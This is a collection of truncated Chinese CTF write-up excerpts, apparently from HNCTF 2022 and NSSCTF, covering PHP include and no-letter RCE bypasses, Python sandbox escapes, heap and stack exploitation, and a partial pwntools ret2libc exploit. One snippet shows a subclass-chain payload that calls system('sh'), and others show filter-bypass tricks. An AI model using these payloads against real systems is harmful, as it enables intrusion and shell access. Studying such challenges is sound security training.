<?php//WEB手要懂得搜索//flagin./flag.phpif(isset($_GET['filter'])){$file=$_GET['filter'];if(!preg_match("/flag/i",$file)){die("error");}include($file);}else{highlight_file(__

题目   DIEIDA找到判断点击数的if，我们修改一下汇编指令让点击数<99999999就成立这个程序没有要求我们输入，说明flag是程序打印的IDA动调 下一个断点修改 得到flag  还有一种更快的方法——CheatEngine 随便点击几次 在CE中修改点击次数 Getf

看到是图片，我一般会去010看看发现数据异常？kali启动发现藏了一个压缩包分离喽压缩包里面存放着flag文件打开发现没有当时就没有什么办法了然后我放在了物理机上发现有129个字符，与文本上的字符不匹配用vim打开哦呦，有隐写呦这就会联想到是零宽度字符的

[HNCTF2022WEEK4]ezheapOff-By-One|堆溢出|leak_libc[*]'/home/bamuwe/ezheap/ezheap'Arch:amd64-64-littleRELRO:FullRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled$checksec./ezheapEasyNo

今天遇到个RCE难题，挺另类的，这里做个复盘。进入题目直接给出了源码，可以发现就是个无字母RCE，且有长度限制不能使用url取反绕过，到这想到了以前的一个rce自增绕过方式，但是以前的没有长度限制。点击查看代码<?phperror_reporting(0);if(isset($_GET['hint'])){highlight_f

[HNCTF2022WEEK2]e@sy_flower发现花指令changetype90nop掉在主函数p重构，然后就可以反编译了编写脚本enc="c~scvdzKCEoDEZ[^roDICUMC"flag=[1]*24forjinrange(24):flag[j]=chr(ord(enc[j])^48)foriinrange(12):v5=flag[2*i+1]

[HNCTF2022Week1]超级签到str2是编写脚本str2='{hello_world}'print(str2.replace(chr(111),chr(48)))#{hell0_w0rld}[HNCTF2022Week1]贝斯是什么乐器啊？enc为码表为脚本为a="NRQ@PAu;8j[+(R:2806.i"flag=""foriinrange(len(a)):fla

这道题没给附件，直接连上看看这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())进行尝试，后面发现bytes函数被禁用了，可以用另外的函数代替().__class__.__base__.__subclasse

拿到程序，先查一下保护状态没开pie，接着看主函数代码逻辑看到这里，因为程序开了canary，本程序没有可以泄露canary的方法，所以普通的栈溢出方法肯定打不了，这里可以考虑一下smashstackStacksmash        在程序加了canary保护之后，如果我们读取的buffer覆盖了对

栈迁移的利用的过程不是很复杂，原理方面是比较麻烦：栈迁移原理介绍与应用-Max1z-博客园(cnblogs.com)这里简述一下栈迁移的利用过程：我们先来看一下这道题的程序保护情况：开了canary，接着看代码逻辑这里的printf("Hello,%s\n",buf);可以发现是可以泄露栈上的内容然后进入v

这道题是简单的libc，不过多分析了exp：frompwnimport*fromLibcSearcherimport*io=remote("node5.anna.nssctf.cn",28341)elf=ELF("./pwn")put_got=elf.got["puts"]put_plt=elf.plt["puts"]main_addr=0x4011A6rdi=0x401273  #用RO

查看附件内容这道题的逻辑就是可以让你输入1或者2，进入各自的函数去执行功能func函数：deffunc():  code=input(">")  if(len(code)>9):    returnprint("you'rehacker!")  try:    print(eval(code))  except:    pass

查看附件，这次有点不太一样，这次是python2的环境只有一个input函数，但是python2的input函数可是不太一样：在python2中，input函数从标准输入接收输入，并且自动eval求值，返回求出来的值在python2中，raw_input函数从标准输入接收输入，并返回输入字符串在python3中，input函数从标准输入接收输

查看附件内容这道题过滤挺多重要的函数，比如exec,input,eval,还对长度做了限制，这里了尝试了help函数，但是最后一步!ls没通，接着考虑breakpoin函数：Python中内置了一个名为breakpoint()的函数，在Python3.7中引入，用于在调试模式下设置断点。使用breakpoint()函数会停止程序的执行，并在

还是先看附件内容这里对字符串长度进行了进一步的限制，长度不能大于7，这里可以输入help()，help函数：help()函数是Python的一个内置函数，用于获取关于模块、函数、类、方法等的帮助信息。当你在交互式命令行中使用help()函数时，它会打开一个交互式帮助系统，让你能够浏览相关主题和

这是一道python沙盒逃逸的题目：沙箱逃逸：就是在给我们的一个代码执行环境下，脱离种种过滤和限制,最终成功拿到shell权限的过程，其实就是闯过重重黑名单，最终拿到系统命令执行权限的过程，这里不理解没关系，多做两道题就知道了，老实说国内的沙箱逃逸的题不是很多，而且大多都是面向新手的？对

easy_unser<?phpinclude'f14g.php';error_reporting(0);highlight_file(__FILE__);classbody{private$want,$todonothing="ican'tgetyouwant,ButyoucantellmebeforeIwakeupandchangemymind"

##WEB##**Challenge__rce**根据给出的源代码来看典型的命令执行但是正则匹配掉说有的字母只留下数字和少量字符串。根据大佬给出的思路使用自增绕过```php<?phperror

简述：因为本人对python的内置函数理解也不是深入，在做题过程中也是靠着出题人的hint和google大法才做出来几题，详细的解题过程和知识点讲解可以看一下春哥的知乎，[PyJail]pyt

HNCTF-webwp[WEEK2]Canyource为期一个月的hnctf我打了一下有几道比较好的题目（或者我之前没有遇到过的）在这里记录一下<?phphighlight_file(__FILE__);if(isset(